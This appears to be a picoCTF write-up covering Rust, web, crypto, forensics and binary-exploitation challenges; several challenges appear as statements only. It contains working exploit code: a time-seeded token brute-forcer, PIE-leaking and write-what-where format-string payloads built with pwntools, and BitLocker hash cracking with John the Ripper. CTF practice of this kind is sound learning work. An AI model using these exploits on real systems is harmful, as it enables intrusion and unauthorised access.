Play this short game to get familiar with terminal applications and some of the most important rules in scope for picoCTF. Connect to the program with netcat:
$ nc verbal-sleep.picoctf.net 64240
Honestly, I didn't really understand it, but after fiddling around for a while I got the flag.
Rust fixme 1 100pts
Problem statement
Have you heard of Rust? Fix the syntax errors in this Rust file to print the flag! Download the Rust code here.

```shell
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
source $HOME/.cargo/en
```
Then unzip the file, and in the extracted directory:
```
┌──(yuma4869㉿yuma4869)-[~/Downloads/ctf/pico/fixme1/fixme1]
└─$ cargo build
   Compiling crossbeam-utils v0.8.20
   Compiling rayon-core v1.12.1
   Compiling either v1.13.0
   Compiling crossbeam-epoch v0.9.18
   Compiling crossbeam-deque v0.8.5
   Compiling rayon v1.10.0
   Compiling xor_cryptor v1.2.3
   Compiling rust_proj v0.1.0 (/home/yuma4869/Downloads/ctf/pico/fixme1/fixme1)
error: expected `;`, found keyword `let`
 --> src/main.rs:5:37
  |
5 |     let key = String::from("CSUCKS") // How do we end statements in Rust?
  |                                     ^ help: add `;` here
...
8 |     let hex_values = ["41", "30", "20", "63", "4a", "45", "54", "76", "01", "1c", "7e", "59", "63", "e1", "61", "...
  |     --- unexpected token

error: argument never used
  --> src/main.rs:26:9
   |
25 |         ":?", // How do we print out a variable in the println function?
   |         ---- formatting specifier missing
26 |         String::from_utf8_lossy(&decrypted_buffer)
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ argument never used

error[E0425]: cannot find value `ret` in this scope
  --> src/main.rs:18:9
   |
18 |     ret; // How do we return in rust?
   |     ^^^ help: a local variable with a similar name exists: `res`

For more information about this error, try `rustc --explain E0425`.
error: could not compile `rust_proj` (bin "rust_proj") due to 3 previous errors
```
Even if you just dump the whole source on an AI it would probably solve it, but going through the errors one by one:
The first error is a missing semicolon.
The second error is println syntax: a placeholder is required but isn't used.
The last error is that in Rust it's return;, not ret;.
Fixing these gives the flag.
Rust fixme 2,3 100pts
I got tired, so please ask an LLM…
Web Exploitation
Cookie Monster Secret Recipe 50pts
Problem statement
Cookie Monster has hidden his top-secret cookie recipe somewhere on his website. As an aspiring cookie detective, your mission is to uncover this delectable secret. Can you outsmart Cookie Monster and find the hidden recipe? You can access the Cookie Monster here and good luck
Welcome to the challenge! In this challenge, you will explore a web application and find an endpoint that exposes a file containing a hidden flag. The application is a simple blog website where you can read articles about various topics, including an article about API Documentation. Your goal is to explore the application and find the endpoint that generates files holding the server’s memory, where a secret flag is hidden. The website is running picoCTF News.
A developer has added profile picture upload functionality to a website. However, the implementation is flawed, and it presents an opportunity for you. Your mission, should you choose to accept it, is to navigate to the provided web page and locate the file upload area. Your ultimate goal is to find the hidden flag located in the /root directory. You can access the web application here!
```
Matching Defaults entries for www-data on challenge:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on challenge:
    (ALL) NOPASSWD: ALL
```
I made a cool website where you can announce whatever you want! Try it out! I heard templating is a cool and modular way to build web apps! Check out my website here!
ABC Bank’s website has a loan calculator to help its clients calculate the amount they pay if they take a loan from the bank. Unfortunately, they are using an eval function to calculate the loan. Bypassing this will give you Remote Code Execution (RCE). Can you exploit the bank’s calculator and read the flag? The website is running Here.
I made a cool website where you can announce whatever you want! I read about input sanitization, so now I remove any kind of characters that could be a problem :) I heard templating is a cool and modular way to build web apps! Check out my website here!
History has failed us, but no matter. Server source. There are two flags in this challenge. Submit flag one here, and flag two in Pachinko Revisited. Website
```php
<?php
if (isset($_POST['username']) && isset($_POST['pwd'])) {
    $username = $_POST['username'];
    $pwd = $_POST['pwd'];
    if ($username == $pwd) {
        // If the username and password are the same, print an error
        echo base64_decode("PGJyLz5GYWlsZWQhIE5vIGZsYWcZmc9yIHlvdQ==");
        // i.e. a message such as "Failed! No flag for you"
    } else {
        if (sha1($username) === sha1($pwd)) {
            // If the SHA-1 hashes match, print the contents of the flag file in the parent directory
            echo file_get_contents(base64_decode("Li4vZmxhZy50eHQ="));
            // This corresponds to "../flag.txt"
        } else {
            // Otherwise print an error
            echo base64_decode("PGJyLz5GYWlsZWQhIE5vIGZsYWcZmc9yIHlvdQ==");
        }
    }
}
?>
```
A company stored a secret message on a server which got breached due to the admin using weakly hashed passwords. Can you gain access to the secret stored within the server? Access the server using nc verbal-sleep.picoctf.net 62644
This service provides you an encrypted flag. Can you decrypt it with just N & e? Connect to the program with netcat: $ nc verbal-sleep.picoctf.net 53723. The program’s source code can be downloaded here.
Hints: 1. How much do we trust randomness? 2. Notice anything interesting about N? 3. Try comparing N across multiple requests
```
N = 18300720288745826987628969180084863434671700199633270143176607386127713564828715605477128540987346815186431009917196183888943234877095300279572252430472506
[+] Request 10
[x] Opening connection to verbal-sleep.picoctf.net on port 53723
[x] Opening connection to verbal-sleep.picoctf.net on port 53723: Trying 3.138.217.147
[+] Opening connection to verbal-sleep.picoctf.net on port 53723: Done
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 336B
[+] Receiving all data: Done (336B)
[*] Closed connection to verbal-sleep.picoctf.net port 53723
N = 23518685348862752993530266484691993799813775296163990719688468538973093730697914720868515657965617045605619329543209923027615769148896160870931119808387294
[*] 共通の素因数を発見!
Flag: picoCTF{tw0_1$_pr!m33486c703}
```
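The hints (randomness, something odd about N, compare N across requests) point at moduli that share a prime, which a plain GCD exposes. This is an added example, not the challenge's or the author's code: the tiny primes, message and function names are constructed here, and the check is the per-pair form of the batch-GCD key-hygiene test that defenders run over a key population.

```python
import math
from typing import Optional, Tuple

E = 65537  # the usual public exponent


def shared_factor(n1: int, n2: int) -> Optional[int]:
    """Return a non-trivial common factor of two RSA moduli, or None if they are coprime.

    Two moduli produced by a generator that re-emits a prime share that prime; each
    key's holder can then factor the other key with one gcd. This is the check that
    a batch-GCD scan over a fleet of certificates performs pairwise.
    """
    g = math.gcd(n1, n2)
    if g in (1, n1, n2):
        return None
    return g


def recover_private_exponent(n: int, p: int, e: int = E) -> int:
    """Given one prime factor p of n, derive the RSA private exponent d."""
    q = n // p
    if p * q != n:
        raise ValueError("p does not divide n")
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)  # modular inverse, Python 3.8+


def decrypt(c: int, n: int, d: int) -> bytes:
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def demo() -> Tuple[Optional[int], bytes]:
    """Constructed sample: a weak RNG hands the same prime p to two 'independent' keys."""
    p = 1000000007      # shared prime (constructed; real keys use ~1024-bit primes)
    q1 = 998244353      # prime unique to key 1
    q2 = 1000000009     # prime unique to key 2
    n1, n2 = p * q1, p * q2
    msg = b"hi"
    c1 = pow(int.from_bytes(msg, "big"), E, n1)  # encrypted under key 1 only
    g = shared_factor(n1, n2)                   # observer only knows n1, n2, c1
    if g is None:
        return None, b""
    d1 = recover_private_exponent(n1, g)
    return g, decrypt(c1, n1, d1)
```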
Guess My Cheese (Part 1) 200pts
Problem statement and hints
Try to decrypt the secret cheese password to prove you’re not the imposter! Connect to the program on our server: nc verbal-sleep.picoctf.net 58847
Hints: Remember that cipher we devised together Squeexy? The one that incorporates your affinity for linear equations???
```
*******************************************
***               Part 1                ***
***    The Mystery of the CLONED RAT    ***
*******************************************

The super evil Dr. Lacktoes Inn Tolerant told me he kidnapped my best friend, Squeexy, and replaced him with an evil clone! You look JUST LIKE SQUEEXY, but I'm not sure if you're him or THE CLONE. I've devised a plan to find out if YOU'RE the REAL SQUEEXY! If you're Squeexy, I'll give you the key to the cloning room so you can maul the imposter...

Here's my secret cheese -- if you're Squeexy, you'll be able to guess it:   LZMLWIRDARHAKVCAUYPJWZ
Hint: The cheeses are top secret and limited edition, so they might look different from cheeses you're used to!
Commands: (g)uess my cheese or (e)ncrypt a cheese
What would you like to do?
```
You're given the encrypted value, and you can choose either to encrypt something or to guess what was encrypted.
I pressed e once to try encrypting something, but it didn't work.
```
What would you like to do? e
What cheese would you like to encrypt? hello
I'm sorry I haven't had that cheese before, so I can't encrypt it!

I don't wanna talk to you too much if you're some suspicious character and not my BFF Squeexy! You have 2 more chances to prove yourself to me!
Commands: (g)uess my cheese or (e)ncrypt a cheese
What would you like to do?
```
Lyrics jump from verses to the refrain kind of like a subroutine call. There’s a hidden refrain this program doesn’t print by default. Can you get it to print it? There might be something in it for you. The program’s source code can be downloaded here. Connect to the program with netcat: $ nc verbal-sleep.picoctf.net 60855
```python
import re
import time

# Read in flag from file
flag = open('flag.txt', 'r').read()

secret_intro = \
'''Pico warriors rising, puzzles laid bare,
Solving each challenge with precision and flair.
With unity and skill, flags we deliver,
The ether’s ours to conquer, '''\
+ flag + '\n'


song_flag_hunters = secret_intro +\
'''[REFRAIN]
We’re flag hunters in the ether, lighting up the grid,
No puzzle too dark, no challenge too hid.
With every exploit we trigger, every byte we decrypt,
We’re chasing that victory, and we’ll never quit.
CROWD (Singalong here!);
RETURN
[VERSE1]
Command line wizards, we’re starting it right,
Spawning shells in the terminal, hacking all night.
Scripts and searches, grep through the void,
Every keystroke, we're a cypher's envoy.
Brute force the lock or craft that regex,
Flag on the horizon, what challenge is next?
REFRAIN;
Echoes in memory, packets in trace,
Digging through the remnants to uncover with haste.
Hex and headers, carving out clues,
Resurrect the hidden, it's forensics we choose.
Disk dumps and packet dumps, follow the trail,
Buried deep in the noise, but we will prevail.
REFRAIN;
Binary sorcerers, let’s tear it apart,
Disassemble the code to reveal the dark heart.
From opcode to logic, tracing each line,
Emulate and break it, this key will be mine.
Debugging the maze, and I see through the deceit,
Patch it up right, and watch the lock release.
REFRAIN;
Ciphertext tumbling, breaking the spin,
Feistel or AES, we’re destined to win.
Frequency, padding, primes on the run,
Vigenère, RSA, cracking them for fun.
Shift the letters, matrices fall,
Decrypt that flag and hear the ether call.
REFRAIN;
SQL injection, XSS flow,
Map the backend out, let the database show.
Inspecting each cookie, fiddler in the fight,
Capturing requests, push the payload just right.
HTML's secrets, backdoors unlocked,
In the world wide labyrinth, we’re never lost.
REFRAIN;
Stack's overflowing, breaking the chain,
ROP gadget wizardry, ride it to fame.
Heap spray in silence, memory's plight,
Race the condition, crash it just right.
Shellcode ready, smashing the frame,
Control the instruction, flags call my name.
REFRAIN;
END;
'''

MAX_LINES = 100

def reader(song, startLabel):
    lip = 0
    start = 0
    refrain = 0
    refrain_return = 0
    finished = False

    # Get list of lyric lines
    song_lines = song.splitlines()

    # Find startLabel, refrain and refrain return
    for i in range(0, len(song_lines)):
        if song_lines[i] == startLabel:
            start = i + 1
        elif song_lines[i] == '[REFRAIN]':
            refrain = i + 1
        elif song_lines[i] == 'RETURN':
            refrain_return = i

    # Print lyrics
    line_count = 0
    lip = start
    while not finished and line_count < MAX_LINES:
        line_count += 1
        for line in song_lines[lip].split(';'):
            if line == '' and song_lines[lip] != '':
                continue
            if line == 'REFRAIN':
                song_lines[refrain_return] = 'RETURN ' + str(lip + 1)
                lip = refrain
            elif re.match(r"CROWD.*", line):
                print(lip)
                crowd = input('Crowd: ')
                song_lines[lip] = 'Crowd: ' + crowd
                lip += 1
            elif re.match(r"RETURN [0-9]+", line):
                lip = int(line.split()[1])
            elif line == 'END':
                finished = True
            else:
                print(line, flush=True)
                time.sleep(0.5)
                lip += 1

reader(song_flag_hunters, '[VERSE1]')
```
```
Echoes in memory, packets in trace,
Digging through the remnants to uncover with haste.
Hex and headers, carving out clues,
Resurrect the hidden, it's forensics we choose.
Disk dumps and packet dumps, follow the trail,
Buried deep in the noise, but we will prevail.
We’re flag hunters in the ether, lighting up the grid,
No puzzle too dark, no challenge too hid.
With every exploit we trigger, every byte we decrypt,
We’re chasing that victory, and we’ll never quit.
Crowd: Pico warriors rising, puzzles laid bare,
Solving each challenge with precision and flair.
With unity and skill, flags we deliver,
The ether’s ours to conquer, picoCTF{70637h3r_f0r3v3r_250bd6ef}
```
Quantum Scrambler 200pts
Problem statement
We invented a new cypher that uses “quantum entanglement” to encode the flag. Do you have what it takes to decode it? Connect to the program with netcat: $ nc verbal-sleep.picoctf.net 51316. The program’s source code can be downloaded here.
quantum_scrambler.py
```python
import sys

def exit():
    sys.exit(0)

def scramble(L):
    A = L
    i = 2
    while (i < len(A)):
        A[i-2] += A.pop(i-1)
        A[i-1].append(A[:i-2])
        i += 1
    return L

def get_flag():
    flag = "picoCTF{dummy}"
    flag = flag.strip()
    hex_flag = []
    for c in flag:
        hex_flag.append([str(hex(ord(c)))])
    return hex_flag

def main():
    flag = get_flag()
    cypher = scramble(flag)
    print(cypher)

if __name__ == '__main__':
    main()
```
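Each scramble step does only two things: it moves the next character's cell onto the end of the previous cell, and it appends a list (a snapshot of the earlier cells) to the cell after that. Strings are never reordered at the top level of a cell, so reading each cell's string entries in order and skipping the nested lists recovers the flag. This added decoder is not the challenge's or the author's code; scramble() is reproduced from the source above so the inverse can be checked against it, and the helper names are mine.

```python
import ast
from typing import List


def scramble(L: List[list]) -> List[list]:
    """The challenge's scramble step, reproduced so the inverse can be tested."""
    A = L
    i = 2
    while i < len(A):
        A[i - 2] += A.pop(i - 1)
        A[i - 1].append(A[:i - 2])
        i += 1
    return L


def to_hex_cells(flag: str) -> List[list]:
    """Mirror of get_flag(): one single-element list per character, holding its hex code."""
    return [[str(hex(ord(c)))] for c in flag]


def unscramble(cypher: List[list]) -> str:
    """Recover the flag from the scrambled structure.

    After the loop, cell k (k < number of steps) is [hex_2k, <snapshot list>, hex_2k+1]
    (cell 0 has no snapshot), the last touched cell is [hex, <snapshot list>] and any
    remaining cells are untouched [hex]. The snapshots are lists, never strings, so the
    string entries of the cells, read in order, are the characters in flag order.
    """
    out = []
    for cell in cypher:
        for item in cell:
            if isinstance(item, str):
                out.append(chr(int(item, 16)))
    return "".join(out)


def unscramble_printed(text: str) -> str:
    """Parse what main() prints (the repr of a nested Python list) and decode it."""
    return unscramble(ast.literal_eval(text))
```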
Can you guess the exact token and unlock the hidden flag? Our school relies on tokens to authenticate students. Unfortunately, someone leaked an important file for token generation. Guess the token to get the flag. The access is granted through nc verbal-sleep.picoctf.net 60220.

```python
import random
import time

def get_random(length):
    alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    random.seed(int(time.time() * 1000))  # seeding with current time
    s = ""
    for i in range(length):
        s += random.choice(alphabet)
    return s

def flag():
    with open('/flag.txt', 'r') as picoCTF:
        content = picoCTF.read()
        print(content)

def main():
    print("Welcome to the token generation challenge!")
    print("Can you guess the token?")

    token_length = 20  # the token length
    token = get_random(token_length)

    try:
        n = 0
        while n < 50:
            user_guess = input("\nEnter your guess for the token (or exit):").strip()
            n += 1
            if user_guess == "exit":
                print("Exiting the program...")
                break

            if user_guess == token:
                print("Congratulations! You found the correct token.")
                flag()
                break
            else:
                print("Sorry, your token does not match. Try again!")

        if n == 50:
            print("\nYou exhausted your attempts, Bye!")

    except KeyboardInterrupt:
        print("\nKeyboard interrupt detected. Exiting the program...")

if __name__ == "__main__":
    main()
```
It issues a token, and if your token matches you get the flag.
The token looks randomly generated, but since the seed is the time it can be broken.
So I figured it was just a matter of matching the time and wrote the following solver.
```python
from pwn import *
import random
import sys
import time

def get_random(length, seed):
    alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    random.seed(seed)
    s = ""
    for i in range(length):
        s += random.choice(alphabet)
    return s

def main():
    count = -50
    while True:
        io = remote('verbal-sleep.picoctf.net', 64041)
        now = time.time()
        now *= 1000
        for i in range(50):
            token = get_random(20, now + count)
            count += 1
            io.sendline(token)
            res = io.recvrepeat(0.3).decode()
            print(res)
            if "Co" in res:
                print(res)
                sys.exit()

if __name__ == "__main__":
    main()
```
But no matter how many times I ran it, it didn't work.
I went off to other problems at this point, and when I came back a teammate had solved it.
What went wrong: the distributed source generated the token as follows.
```python
import random
import time

def get_random(length):
    alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    random.seed(int(time.time() * 1000))  # seeding with current time
    s = ""
    for i in range(length):
        s += random.choice(alphabet)
    return s
```
```python
from pwn import *
import random
import sys
import time

def get_random(length, seed):
    alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    random.seed(seed)
    s = ""
    for i in range(length):
        s += random.choice(alphabet)
    return s

def main():
    count = -50
    while True:
        io = remote('verbal-sleep.picoctf.net', 54486)
        now = int(time.time() * 1000)
        for i in range(50):
            token = get_random(20, now + count)
            count += 1
            io.sendline(token)
            res = io.recvrepeat(0.3).decode()
            print(res)
            if "Co" in res:
                print(res)
                sys.exit()

if __name__ == "__main__":
    main()
```
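The two solvers differ in one detail: the first seeds with a float that still carries fractional milliseconds, the second with the same int(time.time() * 1000) the server uses. This added example (not the challenge's or the author's code; the constructed timestamp and the function names are mine) makes the seed explicit, shows that only a seed numerically equal to the server's integer reproduces the token, and puts a CSPRNG-backed generator beside the weak one as the fix.

```python
import random
import secrets
import string

# Same 62 characters, in the same order, as the challenge's alphabet.
ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase


def weak_token(length: int, seed_ms) -> str:
    """The challenge's generator with the seed passed in instead of read from the clock.

    random.Random(seed) seeds exactly like random.seed(seed), so this reproduces what
    the server computes for a given millisecond value. Anyone who can guess that value
    (a clock is not a secret) can regenerate the token.
    """
    rng = random.Random(seed_ms)
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def reproduces(token: str, length: int, seed_ms) -> bool:
    """Does a candidate seed regenerate the observed token?"""
    return weak_token(length, seed_ms) == token


def secure_token(length: int) -> str:
    """Hardened replacement: draws from the OS CSPRNG, so there is no seed to guess."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def demo():
    """Constructed server seed; compare the two solver styles against it.

    A float seed is hashed before use, and Python hashes an integral float to the same
    value as the equal int, so 1700000000000.0 works; a fractional float hashes to an
    unrelated value and the regenerated token no longer matches (assumption about the
    CPython hash, verified by the assertions that accompany this example).
    """
    seed = 1700000000000            # constructed millisecond timestamp
    server_token = weak_token(20, seed)
    same_int = reproduces(server_token, 20, seed)
    same_float_integral = reproduces(server_token, 20, float(seed))
    same_float_fractional = reproduces(server_token, 20, seed + 0.123)
    return same_int, same_float_integral, same_float_fractional
```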
Tap into Hash 200pts
Problem statement
Can you make sense of this source code file and write a function that will decode the given encrypted file content? Find the encrypted file here. It might be good to analyze the source file to get the flag.
I have been learning to use the Windows API to do cool stuff! Can you wake up my program to get the flag? Download the exe here. Unzip the archive with the password picoctf. Hints: Frida is an easy-to-install, lightweight binary instrumentation toolkit. Try using the CLI tools like frida-trace to auto-generate handlers.
A digital ghost has breached my defenses, and my sensitive data has been stolen! 😱💻 Your mission is to uncover how this phantom intruder infiltrated my system and retrieve the hidden flag. To solve this challenge, you’ll need to analyze the provided PCAP file and track down the attack method. The attacker has cleverly concealed his moves in a well-timed manner. Dive into the network traffic, apply the right filters and show off your forensic prowess and unmask the digital intruder! Find the PCAP file here Network Traffic PCAP file and try to get the flag.
```python
from PIL import Image
import stepic

im = Image.open("image.png")
data = stepic.decode(im)
print(data)
```
Bitlocker-1 200pts
Problem statement
Jacky is not very knowledgeable about the best security passwords and used a simple password to encrypt their BitLocker drive. See if you can break through the encryption! Download the disk image here. Hints: Hash cracking
... The following hashes were found:
I saved the extracted hashes to bithash.txt.
Then I ran John the Ripper.
```
┌──(yuma4869㉿yuma4869)-[~/Downloads/ctf/pico]
└─$ john bithash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (BitLocker, BitLocker [SHA-256 AES 32/64])
Cost 1 (iteration count) is 1048576 for all loaded hashes
Will run 28 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jacqueline       (?)
jacqueline       (?)
2g 0:00:00:20 0.02% (ETA: 2025-03-21 10:49) 0.09537g/s 128.1p/s 256.3c/s 256.3C/s my3kids..sexy1
Session aborted
```
Jacky has learnt about the importance of strong passwords and made sure to encrypt the BitLocker drive with a very long and complex password. We managed to capture the RAM while this drive was opened however. See if you can break through the encryption! Download the disk image here and the RAM dump here. Hints: Try using a volatility plugin
```
┌──(yuma4869㉿yuma4869)-[~/Downloads/ctf/pico/bitlocker2]
└─$ python2 /usr/local/bin/vol.py -f memdump.mem imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win10x64_19041
                     AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/yuma4869/Downloads/ctf/pico/bitlocker2/memdump.mem)
                      PAE type : No PAE
                           DTB : 0x1ad000L
                          KDBG : 0xf8006340eb20L
          Number of Processors : 2
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff800617eb000L
                KPCR for CPU 1 : 0xffffb98179e67000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2025-03-10 02:58:56 UTC+0000
     Image local date and time : 2025-03-09 22:58:56 -0400
```

```
┌──(yuma4869㉿yuma4869)-[~/Downloads/ctf/pico/bitlocker2]
└─$ dislocker -r -V bitlocker-2.dd -k fvek.key -- /media/bitlocker2/
Wed Mar 19 22:55:38 2025 [CRITICAL] None of the provided decryption mean is decrypting the keys. Abort.
Wed Mar 19 22:55:38 2025 [CRITICAL] Unable to grab VMK or FVEK. Abort.
```
Can you try to get the flag? Beware we have PIE! Connect to the program with netcat: The program’s source code can be downloaded here. The binary can be downloaded here.

```c
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void segfault_handler() {
  printf("Segfault Occurred, incorrect address.\n");
  exit(0);
}

int win() {
  FILE *fptr;
  char c;

  printf("You won!\n");
  // Open file
  fptr = fopen("flag.txt", "r");
  if (fptr == NULL) {
    printf("Cannot open file.\n");
    exit(0);
  }

  // Read contents from file
  c = fgetc(fptr);
  while (c != EOF) {
    printf("%c", c);
    c = fgetc(fptr);
  }

  printf("\n");
  fclose(fptr);
}

int main() {
  signal(SIGSEGV, segfault_handler);
  setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered

  printf("Address of main: %p\n", &main);

  unsigned long val;
  printf("Enter the address to jump to, ex => 0x12345: ");
  scanf("%lx", &val);
  printf("Your input: %lx\n", val);

  void (*foo)(void) = (void (*)())val;
  foo();
}
```
Can you try to get the flag? I’m not revealing anything anymore!! Connect to the program with netcat: The program’s source code can be downloaded here. The binary can be downloaded here.

```c
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void segfault_handler() {
  printf("Segfault Occurred, incorrect address.\n");
  exit(0);
}

void call_functions() {
  char buffer[64];
  printf("Enter your name:");
  fgets(buffer, 64, stdin);
  printf(buffer);

  unsigned long val;
  printf(" enter the address to jump to, ex => 0x12345: ");
  scanf("%lx", &val);

  void (*foo)(void) = (void (*)())val;
  foo();
}

int win() {
  FILE *fptr;
  char c;

  printf("You won!\n");
  // Open file
  fptr = fopen("flag.txt", "r");
  if (fptr == NULL) {
    printf("Cannot open file.\n");
    exit(0);
  }

  // Read contents from file
  c = fgetc(fptr);
  while (c != EOF) {
    printf("%c", c);
    c = fgetc(fptr);
  }

  printf("\n");
  fclose(fptr);
}

int main() {
  signal(SIGSEGV, segfault_handler);
  setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered

  call_functions();
  return 0;
}
```

```
gdb-peda$ b *call_functions+80
Breakpoint 1 at 0x1317
gdb-peda$ r
Starting program: /home/yuma4869/Downloads/ctf/pico/pietime2/vuln
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Enter your name:%19$p
Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
Use 'set logging enabled off'.
```

```python
from pwn import *

io = remote("rescued-float.picoctf.net", 60801)
io.sendlineafter(b"Enter your name:", b"%19$p")
main_ret_addr = io.recvline()
win_addr = int(main_ret_addr, 16) - 0xd3
io.sendlineafter(b" enter the address to jump to, ex => 0x12345: ", hex(win_addr).encode())
io.interactive()
```
Here is a binary that has enough privilege to read the content of the flag file but will only let you know its hash. If only it could just give you the actual content! Connect using ssh ctf-player@shape-facility.picoctf.net -p 51683 with the password, redacted, and run the binary named “flaghasher”. You can get a copy of the binary if you wish: scp -P 51683 ctf-player@shape-facility.picoctf.net:~/flaghasher .
Here is a binary that has enough privilege to read the content of the flag file but will only let you know its hash. If only it could just give you the actual content! Connect using ssh ctf-player@rescued-float.picoctf.net -p 49722 with the password, redacted, and run the binary named “flaghasher”.
The echo valley is a simple function that echoes back whatever you say to it. But how do you make it respond with something more interesting, like a flag? Download the source: valley.c. Download the binary: valley. Connect to the service at nc shape-facility.picoctf.net 50740
valley.c
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void print_flag() {
    char buf[32];
    FILE *file = fopen("/home/valley/flag.txt", "r");

    if (file == NULL) {
        perror("Failed to open flag file");
        exit(EXIT_FAILURE);
    }

    fgets(buf, sizeof(buf), file);
    printf("Congrats! Here is your flag: %s", buf);
    fclose(file);
    exit(EXIT_SUCCESS);
}

void echo_valley() {
    printf("Welcome to the Echo Valley, Try Shouting: \n");

    char buf[100];

    while (1) {
        fflush(stdout);
        if (fgets(buf, sizeof(buf), stdin) == NULL) {
            printf("\nEOF detected. Exiting...\n");
            exit(0);
        }

        if (strcmp(buf, "exit\n") == 0) {
            printf("The Valley Disappears\n");
            break;
        }

        printf("You heard in the distance: ");
        printf(buf);
        fflush(stdout);
    }
    fflush(stdout);
}

int main() {
    echo_valley();
    return 0;
}
```
```
┌──(yuma4869㉿yuma4869)-[~/Downloads/ctf/pico/echovalley]
└─$ ./valley
Welcome to the Echo Valley, Try Shouting: 
AAAA%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
You heard in the distance: AAAA0x7fff7900bed0,(nil),(nil),0x55dfdd19f6d2,0x4,0x252c702541414141,0x2c70252c70252c70,0x70252c70252c7025,0x252c70252c70252c,0xb700000a70
```

```
┌──(yuma4869㉿yuma4869)-[~/Downloads/ctf/pico/echovalley]
└─$ python solve.py
[+] Opening connection to shape-facility.picoctf.net on port 54347: Done
[*] stack_write_addr: 0x7fff28ff6078
[*] echo_return_addr: 0x5ba3d5886413
[*] print_flag_addr: 0x5ba3d5886269
/home/yuma4869/.local/lib/python3.13/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ISO-8859-1, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] %25193c%11$lln%29471c%12$hn%34331c%13$hnx`ÿ(ÿ\x7f\x00\x00z`ÿ(ÿ\x7f\x00\x00|`ÿ(ÿ\x7f\x00\x00
[+] Receiving all data: Done (50B)
[*] Closed connection to shape-facility.picoctf.net port 54347
/home/yuma4869/.local/lib/python3.13/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] Here is your flag: picoctf{f1ckl3_f0rmat_f1asc0}
```